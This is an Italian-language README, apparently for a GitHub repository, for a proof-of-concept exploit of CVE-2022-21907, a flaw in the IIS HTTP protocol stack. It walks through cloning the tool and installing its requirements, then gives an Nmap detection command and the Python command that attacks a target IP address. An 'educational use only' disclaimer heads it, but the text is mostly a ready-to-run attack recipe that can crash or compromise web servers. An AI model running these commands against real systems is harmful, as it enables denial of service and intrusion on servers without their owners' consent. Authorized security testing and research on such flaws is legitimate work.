
Exploit proof-of-concept per CVE-2022-21907, una vulnerabilità di esecuzione remota di codice nello stack del protocollo HTTP (IIS). Include uno script Python e uno script Nmap per rilevamento e sfruttamento.
⚠️ Solo per scopi educativi e di ricerca sulla sicurezza autorizzati
Un ringraziamento speciale all'autore originale del PoC NU11SECURITY e a michelep
Vulnerabilità di esecuzione remota di codice nello stack del protocollo HTTP. Questa vulnerabilità può causare un attacco denial-of-service a un sistema target che esegue un server web IIS.
Installa git, poi clona il PoC dal repository GitHub:
sudo apt install git -y
git clone https://github.com/asepsaepdin/CVE-2022-21907.git
Installa i requisiti usando il comando pip3:
sudo apt install python3-pip -y
cd CVE-2022-21907
pip3 install -r requirements.txt
Verifica la presenza della vulnerabilità sulla macchina target usando il comando:
nmap -p 80 --script dos_iis_2022_21907 10.10.10.1
Quindi, esegui gli script PoC usando il comando:
python3 CVE-2022-21907.py -i 10.10.1.10
Note: specificare l'opzione -i con l'indirizzo IP del target